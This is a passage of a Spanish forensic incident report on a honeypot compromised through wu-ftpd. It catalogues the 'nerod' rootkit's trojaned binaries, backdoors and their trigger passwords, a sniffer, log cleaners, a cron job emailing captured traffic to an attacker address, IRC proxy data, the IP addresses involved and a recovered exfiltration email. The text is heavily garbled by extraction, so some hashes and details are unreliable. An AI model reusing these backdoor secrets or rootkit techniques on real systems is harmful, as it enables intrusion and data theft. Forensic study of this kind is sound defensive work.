Programa para arrancar otros binarios escondiendo su autntico nombre, cambiando el argv[0]. Uso: shad <nombre_ficticio><comando a ejecutar> <parametros>. Instalado por el script de instalacin del rootkit bajo /var/tmp/nerod /dev/hdx1 d41d8cd98f 00b204e9800998ecf 8427e d41d8cd98f 00b204e9800998ecf 8427e
Estos dos ficheros vacos resultan de la ejecucin de un programa contaminado con el virus RST.b. En concreto, el origen del mismo es /var/tmp/.,/httpd. /dev/ttyoa 6b7b4d6270255ba973f 9865020490423
Contiene las conexiones de red a esconder de la salida del comando 'netstat' troyano. El formato del fichero es el siguiente: [ 1 =Esconder conexiones entrantes de esa direccin ] [ 2 =Esconder conexiones salientes a esa direccin ] [ 3 =Esconder conexiones entrantes a ese puerto ] [ 4 =Esconder conexiones salientes a ese puerto ] [ 5 =Esconder un socket UNIX (directorio) ]
/dev/ttyof 14aaf eab735548f 0d6c24cf b6e6803c0
Contiene la lista de ficheros a esconder (fichero de configuracin de los comandos troyanos 'ls', 'du', 'find' y 'vdir') /dev/ttyop 710657a7b9f 9f b864739f 57a71f 37ecc
Contiene la lista de procesos a esconder (fichero de configuracin de los comandos troyanos 'ps', 'killall', 'top' y 'pstree') /dev/ttyos 9da4ef c8df c18db52f 0f 39f dc1f 04f f 3
Contiene la lista de cadenas a esconder del sistema de log (fichero de configuracin del syslogd troyano instalado) /etc/ftp 67b48c5d64cf 856db41ae33636cf 748e
Fichero de texto, que nicamente contiene la cadena "ssh", aparentemente con la intencin de impedir el acceso del usuario ssh via ftp /etc/ftpusers 37022f 11e99ae50bba1e304d3f 82f ae5
Modificado por el hacker, para contener ssh, con la intencin de impedir el acceso de este usuario via ftp. /etc/group 61c6a6548763338d16ad210564b48f b4 21492de7c7058104cbf 337de42576765
Modificados para tener el usuario 'nerod'. /etc/gshadow 74e7c4edf 1d9344c31bb85b686748d5b 78d7d99f 79928eb6c0239ee69ad7e4d3
Ficheros shadow del /etc/group. /etc/passwd a74ac1c6c65c7c20f f 392ecf 62770d0d aed586ed7f 875f ba47848814d58655f 6
Con respecto a un sistema 'limpio', hay 3 cuentas: pepelu (creada por el administrador del sistema), ssh (creada por el script /var/tmp/nerod/install, sin password) y nerod, creada en la intrusin. Adems, se ha eliminado la cuenta ftp.
Copia del /etc/passwd, hecha por el administrador tras aadir el usuario pepelu. /etc/rc.d/init.d/atd 5e13cb6e8a752921bae378ea9ccbb2ec
Fichero de arranque del demonio 'atd', instalado en /etc/rc.d/init.d/atd, que adems de arrancar del demonio de 'at' tal y como hace el fichero estndar, se asegura de arrancar todos los troyanos instalados con unas lneas de "inet_start all" camufladas por enmedio. Esta funcin 'inet_start' est definida en el fichero 'functions', tambin modificado por el rootkit. /etc/rc.d/init.d/functions 231835c85f 215a44f e2d48c9dc389457
Script modificado para definir la funcin 'inet_start' para arrancar los siguientes troyanos: sshd y el sniffer bajo /usr/local/games/identd. Se copi al final del fichero /etc/rc.d/init.d/functions estndar por el script de instalacin del rootkit. De esta forma, y al ser tambin modificados /etc/rc.d/init.d/atd y /etc/rc.d/init.d/inet, se asegura el arranque automtico de los mismos con el inicio del sistema. /etc/rc.d/init.d/sshd b33deb29db1aed81866e048416b0bd68
Script de arranque del demonio sshd instalado desde /var/tmp/nerod/sshd; el script 'sshd-install' lo copia desde init.sshd. La diferencia fundamental con el script de arranque estndar es que ste nunca intenta generar nuevas claves, con el objeto de seguir siempre empleando las instaladas por el hacker. /etc/rc.d/init.d/syslog 29056af 3f f 697f 3cf 5de07ef 3bc46814
Script de arranque del demonio syslogd, copiado desde /var/tmp/nerod / etc/ ssh/ ssh_host_key 4ef f c0e40601df 5c7ac6617c4f 41eb51
Clave privada de ssh, copiada desde /var/tmp/nerod/sshd. Interesante la cadena root@xxxbuck.com. /etc/ssh/sshd_config 57d92002e68514d8998ee64198bbe975
Fichero de configuracin de sshd, instalado por 'sshd-install' desde /var/tmp/nerod/sshd. Configura al demonio para escuchar en el puerto 1981, en lugar del estndar 22. /etc/ssh_host_key 4ef f c0e40601df 5c7ac6617c4f 41eb51
Clave privada de ssh, copiada desde /var/tmp/nerod/sshd. Interesante la cadena root@xxxbuck.com. /etc/ssh_random_seed b2cbc7108a7f 5373961a84f d04f 67da8
Fichero semilla de ssh, copiado desde /var/tmp/nerod/sshd. /etc/sshd_config 57d92002e68514d8998ee64198bbe975
Fichero de configuracin de sshd, instalado por 'sshd-install' desde /var/tmp/nerod/sshd. Configura al demonio para escuchar en el puerto 1981, en lugar del estndar 22. /etc/xinetd.d/wu-ftpd 0291b392c300c7a92870320388205f 2a
Configurado por el administrador del sistema para habilitar wu-ftpd /home/nerod/.bash_log out d19bbbed9d713f 97f 487b9ed9ec3f 62f /home/nerod/.bash_prof ile 4e864b291c787d826e6f c8daf 31c2f 83 /home/nerod/.bashrc b4bae87d7ae5dec79524bcd6eef b9acb /home/nerod/.emacs 5b3d50b0ecc06f 0cc0071524d133acf 6 /home/nerod/.screenrc c17d319e7b9f f d7cde89e6f 65cf cf cac Informe tcnico Reto de Anlisis Forense
Pg. 35
Ficheros estndar de configuracin RedHat7 para 'nerod'.
Ficheros estndar de configuracin RedHat7 para 'pepelu'. / root/ .bash_history 04ee52d8d06e83e650ca580294b807ea
Contiene una serie de comandos ejecutados por root, Hay varias partes bien diferenciadas: 1- Configuracin de lilo y wu-ftpd, realizada por el administrador del sistema. 2- Actividad de intrusin, relacionada con la descarga y creacin de ficheros bajo /root/., 3- Actividad de intrusin, relacionada con actividad bajo /var/tmp/., Es interesante hacer notar que el fichero fue truncado por el administrador del sistema para no dejar constancia de los comandos ejecutados por el para copiar las imgenes de las particiones. /root/.ncftp/firewall 1cbb57a19bdf 8db88a29a9219bcc2cc6
Fichero de configuracin de 'ncftp' para el usuario root. Ncftp fue usado por los administradores del sistema para copiar ficheros. / sbin/ iportmap e47eb7a4d32ec4b80b29d4d238ef 4a8c
Binario /sbin/portmap original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install / sbin/ syslogd 53f c8c03b327952f be891d4f 02a036b8
Syslogd troyano, forma parte del rootkit instalado desde /var/ftp/nerod. No enva al log del sistema ninguna informacin con cadenas encontradas en /dev/ttyos /usr/bin/chsh 71dcb1516635e8910a37444ecd95992f
Troyano del comando /usr/bin/chsh, est adems protegido contra el anlisis, al capturar las llamadas a 'ptrace'. Se trata de un 'backdoor' que da acceso al sistema como 'root' al introducir como nueva shell la palabra clave "satori". Este binario es alguna variante del incluido en el rootkit lrk4, ver Uhttp://project.honeynet.org/papers/enemy3/README.txtU. Instalado desde /var/ftp/nerod /usr/bin/clean f 9e2970e3a7682440316b6e1a2687cbe
Script para borrar todas las lneas conteniendo una cadena que se pase como parmetro de todos los ficheros de log bajo /var/log, rearrancando el demonio syslogd. Instalado por el script de instalacin 'install' del rootkit bajo /var/ftp/nerod /usr/bin/dir 9e7165f 965254830d0525f da3168f d7d
Troyano del comando /bin/ls, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof. Se trata del mismo fichero analizado en el reto de honeynet #29 (ver por ejemplo, Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU). Instalado desde /var/ftp/nerod
Troyano del comando /usr/bin/du, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof. Copiado desde /var/ftp/nerod. /usr/bin/find eb1c26da59b892570f 4567469d49bd8c
Troyano del comando /usr/bin/find, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof. Instalado desde /var/ftp/nerod. / usr/ bin/ imp da4171d1b46b7792b79a53f c87457f e4
Herramienta de denegacin de servicio (DoS) mediante la tcnica de 'SYN flooding', bombardea a un sistema objetivo con un alto nmero de peticiones de conexin, consiguiendo de forma efectiva su paralizacin. Instalada desde /var/ftp/nerod por el script de instalacin del rootkit. Conocida tambin como 'slice3' puede obtenerse enU http://packetstormsecurity.nl/DoS/indexdate.shtmlU /usr/bin/killall 1678eb0817a0775f dadd24119e28d810
Troyano del comando /usr/bin/killall, ignora los procesos indicados en el fichero de configuracin /dev/ttyop. Instalado desde /var/ftp/nerod. /usr/bin/lfind 13838a254761739dc06b05663a5770b2
Binario /usr/bin/find original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install /usr/bin/ltop be854d9c69c40b22535323bf 29cbb20e
Binario /usr/bin/top original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install /usr/bin/pidof ed439d80889017f e5499c2e6e6448a24
Binario /usr/bin/killall original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install /usr/bin/rmold 61eaec2dc4b9466c6e67f d029eb03425
Programa para arrancar otros binarios escondiendo su autntico nombre, cambiando el argv[0]. Uso: shad <nombre_ficticio><comando a ejecutar> <parametros>. Instalado por el script de instalacin del rootkit bajo /var/tmp/nerod /usr/bin/top 58a7e5abe4b01923c619aca3431e13a8
Troyano del comando top, instalado desde el rootkit de /var/tmp/nerod/, esconde de su salida los procesos indicados en el fichero de configuracin /dev/ttyop /usr/bin/vdir bf b9788eaa2010ebad96be6aead8a600
Troyano del comando vdir, instalado desde /var/tmp/nerod, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof. /usr/bin/wp c4774db51553f 61c8aef b1bcc123a81c
Programa para limpiar los ficheros de log wtmp,utmp y lastlog. Copiado desde /var/ftp/nerod /usr/bin/xlogin 4368d13785a784d0a2f 857c725c83939
Binario /bin/login original de RedHat 7.1, movido aqu por el script Informe tcnico Reto de Anlisis Forense
Pg. 37 /var/ftp/nerod/install /usr/include/rpcsvc/du f 912f 7c86b79779261651055f 6a96b1d
Binario /usr/bin/du original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install /usr/include/rpcsvc/syslo gd 9701beb6453b49d599ae42e6a99a93b8
Binario /sbin/syslogd original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install /usr/local/games/banne r 464dc23cac477c43418eb8d3ef 087065
Script de perl para analizar la salida del sniffer LinSniffer, instalado desde /var/ftp/nerod por el script de instalacin del rootkit. Se trata del mismo fichero analizado en el reto de honeynet #29 (ver por ejemplo, Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU) /usr/local/games/identd 10f 6663e2e867f 4d3f 628648d340e7be
Sniffer de red. Instalado desde /var/ftp/nerod por el script de instalacin del rootkit, recoge el trfico de red y lo almacena en /usr/local/games/tcp.log /usr/local/games/tcp.lo g 4aee47f 4435329eda02b050f 54ad7b49
Se trata de un troyano de sshd, con una puerta trasera que permite el acceso al sistema con el password cuyo md5 sea "54818b05d116eadc7f67517a3a6e4b33", instalada desde /var/ftp/nerod. /usr/sbin/atd 93002f 144f de901260f 4b4ebdce57630
backdoor de red. Se trata de una shell conectada al puerto 465 (smtps) haciendose pasar por un servidor Sendmail: aparece el banner tpico de: 220 - localhost.localdomain SMTPS Sendmail 8.11.0/8.11.0; <fecha>. Cualquier comando que se le introduzca produce un simulacro de error: 500 5.5.1 Command unrecognized: "<comando>" Unicamente al introducir una palabra cuyo checksum md5 de como resultado "855f314a4a3eebb6e1f9c3dae3a8ae31" (generado con un simple echo -n | /usr/bin/md5sum) se abre automticamente una shell, de la que se ha eliminado el history log. Este binario se copia a desde /var/ftp/nerod/md5bd mediante el script de 'install'. Se trata del mismo fichero descrito en HUhttp://www.blockout.info/BkdoorRkTroj/Fredriktxt1.txtUH.
Informe tcnico Reto de Anlisis Forense
Pg. 38 /var/spool/cron/operato r be89bbc0370ac251540813355a1f d850
Fichero de configuracin de cron, para enviar el primero de cada mes el fichero resultado de sniffing (/usr/local/games/tcp.log) junto con la configuracin de red del sistema a la direccin de correo suntsfant2@yahoo.com". Modificado desde la instalacin de /var/ftp/nerod
5.5. Resumen de la actividad IRC A efectos de facilitar su comparacin, hemos agrupado en esta tabla resumen la informacin sobre los proxies de IRC configurados en el sistema: /root/.,/psybnc /var/tmp/.,/psync /var/tmp/.,/emech Versin 2.2.1 2.2.2BETA N/A Puertos locales 3245 6869 1983 6669 N/A Servidores IRC mesa.az.us.undernet.org:66 67 eu.undernet.org:6667 mesa.az.us.undernet.org:66 67 stockholm.se.eu.undernet.o rg:6667 15 servidores undernet (los de por defecto) Login George / george adrian adrian User Sa lmi Sugi Pola Cu Whoisu Tau Cu Tot Lamere / ^2^311,12Protected By Pizda Lui Mata... Gone 4 Everto another space Lost4Ever in Cyberspace Password `l0G'80... / idem. `Y14`k1I... 12-rY... Nick NeRoD / NeRoD a Lost4Ever Canales #hackeri #half_bb #help-me #School-Help #beton #bag.pula.in.mata.cu.whoi su.tau.cu.tot #linuxvr N/A #beius #beton Arranque 23 Ago 01:17:41 23 Ago 10:18:29 23 Ago 10:20:29 Ultimo mensaje/acceso 23 Ago 01:17:41 23 Ago 15:31:48 23 Ago 15:00:00 (modificacin y cambio de mech.session) PID 7464 7956 7989 Conexiones De la unidad 781 de swap:
01:18:47 George (80.96.68.72) 03:19:41 george (misma IP) 09:29:17 George (80.96.68.71) 09:37:23 george (misma IP) Del fichero de log (/ var/ .,/ psybnc/ log/ psybnc .log):
10:22:19 Connect from 213.154.99.10. New user adrian. N/ A Informe tcnico Reto de Anlisis Forense
Pg. 39
6. Direcciones IP implicadas A continuacin se muestra la informacin de registro de algunas direcciones IP implicadas en el ataque analizado. En los casos en los que ha sido posible, se ha aadido informacin obtenida de DShield (Uwww.dshield.orgU) y/o Google (Uwww.google.comU).
Direccin IP Razn de inters / Informacin de registro 218.146.115.18 Primera conexin FTP annima, Aug 22 08:17:24, registrada en /var/log/secure. Sin traduccin DNS. Asociada a un ISP de Korea: Uwww.kornet.comU
Informacin de registro: * APNI C ( Asi a) : www. apni c. net i net num: 218. 144. 0. 0 - 218. 159. 255. 255 net name: KORNET descr : KOREA TELECOM descr : Net wor k Management Cent er count r y: KR
213.84.155.131 Conexin FTP annima, Aug 22 08:30:13, registrada en /var/log/secure. Traduccin DNS: 84-155-131.adsl.xs4all.nl Asociada a un ISP de Holanda: Uwww.xs4all.netU
Informacin de registro: * RI PE ( Eur opa) : www. r i pe. net i net num: 213. 84. 137. 0 - 213. 84. 159. 255 net name: XS4ALL- ADSL descr : XS4ALL I nt er net BV descr : ADSL St at i c I P number s count r y: NL
210.83.207.251 Conexin FTP sin autentificarse (ni siquiera como annima), Aug 22 13:11:59, registrada en /var/log/secure. Sin traduccin DNS. Asociada a un ISP de China: china-netcom.com
Otros sitios en Internet han recibido escaneos de puertos desde esta IP hacia el puerto de FTP (21), por lo que parece que se dispona de un exploit para FTP con el que se pretenda acceder a numerosos equipos: Uhttp:/ / cert.uni-stuttgart.de/ archive/ intrusions/ 2002/ 08/ msg00260.html
Informacin de registro: * APNI C: i net num: 210. 83. 207. 240 - 210. 83. 207. 255 net name: dal i an- guanganmen- cor p count r y: cn descr : dal i an ci t y admi n- c: TC254- AP t ech- c: TC254- AP
Informe tcnico Reto de Anlisis Forense
Pg. 40 Direccin IP Razn de inters / Informacin de registro 200.47.186.114 Conexiones FTP annimas, Aug 23 00:12:13 y 00:22:48, registradas en /var/log/secure. Sin traduccin DNS. Asociada a un ISP de Per: Uwww.comsat.com.peU.
Esta es la direccin IP desde la que el atacante logr acceso como root al sistema.
Informacin de registro: * LACNI C ( Lat i noamr i ca y Car i be) : www. l acni c. net i net num: 200. 47. 186/ 24 st at us: r eal l ocat ed owner : COMSAT Per u S. A. - LMGT owner i d: PE- CPSL1- LACNI C r esponsi bl e: Oper aci ones COMSAT addr ess: Mar t i r Ol aya, 129, Mi r af l or es addr ess: 18 - Li ma - LI count r y: PE 195.116.20.232 Conexin SSH, Aug 22 08:17:24, registrada en / var/ log/ secure. Sin traduccin DNS. Asociada a un ISP de Polonia: Uwww.telekomunikacja.plU.
Como curiosidad, existen en Google informes que reflejan que se accedi desde esta IP a "Uhttp://www.sdf.se/~jocke/U".
Informacin de registro: * RI PE: i net num: 195. 116. 0. 0 - 195. 117. 255. 255 net name: PL- TPSA- 960123 descr : PROVI DER descr : TP S. A. Cent r umSyst emow Tel ei nf or mat ycznych count r y: PL
213.154.99.10 Conexin al psybnc de /var/.,/psybnc como usuario adrian. Traduccin DNS: unasigned-reverse-213.154.99.10.pcnet.ro Asociada a un ISP de Rumana: Uwww.pcnet.roU
Informacin de registro: * RI PE:
i net num: 213. 154. 96. 0 - 213. 154. 127. 255 net name: PCNET descr : PCNET Dat a Net wor k S. A. descr : PROVI DER ADSL Net wor k count r y: RO
80.96.68.72 y 71 Conexiones del psybnc de /root/.,/psybnc como usuario George y george Traducciones DNS: 80-96-68-72.rdsnet.ro y 80-96-68-71.rdsnet.ro. Asociada a un ISP de Rumana: Uwww.rdsnet.roU
Informacin de registro: * RI PE:
i net num: 80. 96. 68. 64 - 80. 96. 68. 79 net name: SC- ADO- NET- SRL descr : SC Ado Net SRL descr : st r . Andr ei Mur esan, nr . 2 descr : Campi a Tur zi i , Cl uj count r y: r o
Informe tcnico Reto de Anlisis Forense
Pg. 41
7. Conclusiones Las siguientes conclusiones pueden ser extradas de la investigacin de este incidente.
7.1. Conclusin 1 El incidente se puede resumir en los siguientes hechos: Un atacante logr acceso como root al sistema explotando la vulnerabilidad CVE-2001-0550 (wu-ftpd glob) del demonio servidor de FTP "wu-ftpd". A continuacin instal y ejecut parcialmente un paquete de programas denominado "nerod.tgz". Este grupo de programas constituan un "rootkit", destinado a la apertura de puertas traseras y la ocultacin de las actividades del intruso. Despus accedi al sistema utilizando una de sus puertas traseras, cerr el camino a otros atacantes que intentaran explotar la misma vulnerabilidad, e instal dos paquetes de programas bajo "/root/.,": psybnc y awu. El primero es un conocido proxy de IRC que permite realizar conexiones IRC de forma annima y el segundo es un conjunto de programas que permiten el ataque automtico a multitud de sistemas con la vulnerabilidad de wu-ftpd. Finalmente, en una nueva conexin mediante una de sus puertas traseras, el intruso descarg e instal dos nuevos paquetes de programas, esta vez bajo "/var/.,": psybnc (una versin ms reciente) y emech (manu.tgz). El primero es otra versin del programa ya comentado, y el segundo es un cliente automtico de IRC (IRC bot). En paralelo, se registr cierta actividad de los proxies IRC instalados por el atacante.
7.2. Conclusin 2 Los ataques son frecuentes, mucho ms frecuentes de lo que comnmente se piensa. Y muchos de ellos son exitosos. Y muchos de esos ataques exitosos pasan desapercibidos. Esta conclusin se apoya en los siguientes hechos: No transcurrieron ni veinticuatro horas desde que se conect el sistema a la red hasta que recibi el primer escaneo. El sistema fue retirado de la red, o al menos se hicieron las copias Informe tcnico Reto de Anlisis Forense
Pg. 42 de sus particiones que han sido analizadas, el mismo da en que el intruso logr vulnerar el sistema. En este caso el sistema estaba seguramente bajo un escrutinio muy minucioso, dado que su objetivo desde el momento de la instalacin era probablemente el de servir de vctima para poder convocar este reto forense. Pero en la vida real, la mayora de los sistemas no estn vigilados tan de cerca. Cunto tiempo habra pasado hasta que un administrador hubiese notado "algo extrao" en el sistema si no se hubiera tratado de una mquina trampa (honeypot)?
7.3. Conclusin 3 Un anlisis forense de un sistema proporciona una enorme cantidad de informacin sobre las actividades realizadas en ese sistema, y puede aportar mucho (en algunos casos "todo") a la investigacin de un posible incidente.
7.4. Conclusin 4 Preservar la evidencia es crucial para cualquier investigacin forense. En incidentes informticos, como en incidentes de la vida real, la preservacin de la evidencia juega un papel fundamental en el proceso para asegurar el xito de la investigacin. En este incidente, mucha de la informacin ha sido posible obtenerla porque se dispona de imgenes binarias de las particiones del sistema de un instante de tiempo cercano al incidente y sin demasiadas modificaciones inducidas por el propio administrador del sistema. Si el administrador, cuando entr en el sistema para generar las copias, hubiera empezado a lanzar comandos para "investigar", muchas de las pruebas habran desaparecido. Vase, por ejemplo, que el simple hecho de ejecutar el comando "ls", al estar ste infectado por el virus RST.b, provoc que se reinfectaran muchos comandos bajo /usr/bin, modificando sus fechas de modificacin, haciendo ms difcil determinar la fecha y hora de su infeccin inicial. No modificar en absoluto la evidencia no es posible en la mayora de los casos, pero siempre se debe intentar que la modificacin sea la menor posible.
P Advisory CA-2001-33 Multiple Vulnerabilities in WU-FTPD.
Descrito en HUhttp://www.cert.org/advisories/CA-2001-33.htmlUH. [6] The Honeynet project. Uhttp://www.honeynet.org U [7] Corelabs Vulnerability Report For WU-FTPD Server. Disponible en HUhttp://www1.corest.com/common/showdoc.php?idx=172&idxseccion=10UH [8] RedHat 7.X security advisories, disponibles bajo HUhttp://www.redhat.com/support/errata/rh7-errata-security.htmlUHU.U [9] RedHat Linux. HUhttp://www.redhat.com/UHU.U [10] Google. HUhttp://www.google.com/UHU.U [11] EnergyMech IRCbot. HUhttp://www.energymech.netUH [12] Qualys Security Alert QSA-2002-01-01 "Remote Shell Trojan b" (RST.b). HUhttp://www.securityfocus.com/archive/75/249346UH HUhttp://www.securityfocus.com/archive/100/247640UH HUhttp://www.virusbtn.com/magazine/archives/pdf/2002/200202.PDFUH [13] Distributed Intrusion Detection System, HUhttp://www.dshield.org/UH
Informe tcnico Reto de Anlisis Forense
Pg. 44 9. Anexos 9.1. Mail enviado en instalacin de nerod A continuacin se muestra el contenido de los ficheros temporales de sendmail con la informacin de cabecera y el cuerpo del mensaje, respectivamente, de un mensaje de correo electrnico enviado por la instalacin del rootkit nerod.
Ambos ficheros fueron recuperados de la zona de espacio en disco libre de la particin /var del sistema analizado, usando Autopsy:
Cont ent s Of Fi l e: / var / spool / mqueue/ t f g7MMQ5J 07358
V4 T1030055165 K0 N0 P34397 I 3/ 7/ 38170 Fb $_r oot @l ocal host Sr oot Ar oot @l ocal host . l ocal domai n RPFD: f r umosu99us@yahoo. com H?P?Ret ur n- Pat h: <^129g> H??Recei ved: ( f r omr oot @l ocal host ) by l ocal host . l ocal domai n ( 8. 11. 2/ 8. 11. 2) i d g7MMQ5J 07358 f or f r umosu99us@yahoo. com; Fr i , 23 Aug 2002 00: 26: 05 +0200 H?D?Dat e: Fr i , 23 Aug 2002 00: 26: 05 +0200 H?F?Fr om: r oot <r oot > H?x?Ful l - Name: r oot H?M?Message- I d: <200208222226. g7MMQ5J 07358@l ocal host . l ocal domai n> H??To: f r umosu99us@yahoo. com H??Subj ect : r 00t l a 80
Cont ent s Of Fi l e: / var / spool / mqueue/ df g7MMQ5J 07358
Host name : l ocal host . l ocal domai n ( 192. 168. 3. 10) Al t er nat i ve I P : 127. 0. 0. 1 Host : l ocal host . l ocal domai n Di st r o: Red Hat Li nux r el ease 7. 1 ( Seawol f ) Uname - a Li nux l ocal host . l ocal domai n 2. 4. 2- 2 #1 Sun Apr 8 19: 37: 14 EDT 2001 i 586 unknown Upt i me 12: 25am up 1 day, 5: 24, 0 user s, l oad aver age: 0. 60, 0. 16, 0. 05 Pwd / var / f t p/ ner od I D ui d=0( r oot ) gi d=0( r oot ) gr oups=50( f t p) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Yahoo. compi ng: Informe tcnico Reto de Anlisis Forense
Pg. 45
PI NG 216. 115. 108. 243 ( 216. 115. 108. 243) f r om192. 168. 3. 10 : 56( 84) byt es of dat a.
- - - 216. 115. 108. 243 pi ng st at i st i cs - - - 6 packet s t r ansmi t t ed, 0 packet s r ecei ved, 100%packet l oss - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Hw i nf o:
CPU Speed: 166. 196MHz CPU Vendor : vendor _i d : Genui neI nt el CPU Model : model name : Pent i um75 - 200 RAM: 48 Mb HDD( s) : Fi l esyst em Type Si ze Used Avai l Use%Mount ed on / dev/ hda8 ext 2 251M 52M 185M 22%/ / dev/ hda1 ext 2 53M 3. 4M 47M 7%/ boot / dev/ hda6 ext 2 1. 5G 44k 1. 4G 1%/ home / dev/ hda5 ext 2 1. 5G 479M 1023M 32%/ usr / dev/ hda7 ext 2 251M 20M 218M 9%/ var - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Por t s open: por t map 462 r oot 4u I Pv4 740 TCP *: sunr pc ( LI STEN) r pc. st at d 477 r oot 6u I Pv4 775 TCP *: 1024 ( LI STEN) sshd 649 r oot 3u I Pv4 973 TCP *: ssh ( LI STEN) sendmai l 704 r oot 4u I Pv4 1060 TCP l ocal host . l ocal domai n: smt p ( LI STEN) xi net d 812 r oot 3u I Pv4 1184 TCP *: f t p ( LI STEN) sshd 7203 r oot 3u I Pv4 7762 TCP *: 4 ( LI STEN) at d 7212 r oot 3u I Pv4 7747 TCP *: smt ps ( LI STEN) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - / et c/ passwd & / et c/ shadow
/ et c/ passwd r oot : x: 0: 0: r oot : / r oot : / bi n/ bash bi n: x: 1: 1: bi n: / bi n: daemon: x: 2: 2: daemon: / sbi n: adm: x: 3: 4: adm: / var / adm: l p: x: 4: 7: l p: / var / spool / l pd: sync: x: 5: 0: sync: / sbi n: / bi n/ sync shut down: x: 6: 0: shut down: / sbi n: / sbi n/ shut down hal t : x: 7: 0: hal t : / sbi n: / sbi n/ hal t mai l : x: 8: 12: mai l : / var / spool / mai l : news: x: 9: 13: news: / var / spool / news: uucp: x: 10: 14: uucp: / var / spool / uucp: oper at or : x: 11: 0: oper at or : / r oot : games: x: 12: 100: games: / usr / games: gopher : x: 13: 30: gopher : / usr / l i b/ gopher - dat a: f t p: x: 14: 50: FTP User : / var / f t p: nobody: x: 99: 99: Nobody: / : nscd: x: 28: 28: NSCD Daemon: / : / bi n/ f al se apache: x: 48: 48: Apache: / var / www: / bi n/ f al se named: x: 25: 25: Named: / var / named: / bi n/ f al se l dap: x: 55: 55: LDAP User : / var / l i b/ l dap: / bi n/ f al se mai l nul l : x: 47: 47: : / var / spool / mqueue: / dev/ nul l i dent : x: 98: 98: pi dent user : / : / bi n/ f al se r pc: x: 32: 32: Por t mapper RPC user : / : / bi n/ f al se r pcuser : x: 29: 29: RPC Ser vi ce User : / var / l i b/ nf s: / bi n/ f al se xf s: x: 43: 43: X Font Ser ver : / et c/ X11/ f s: / bi n/ f al se pepel u: x: 500: 500: J ose Lui s Mar t i nez: / home/ pepel u: / bi n/ bash ssh: x: 0: 0: r oot : / r oot : / bi n/ bash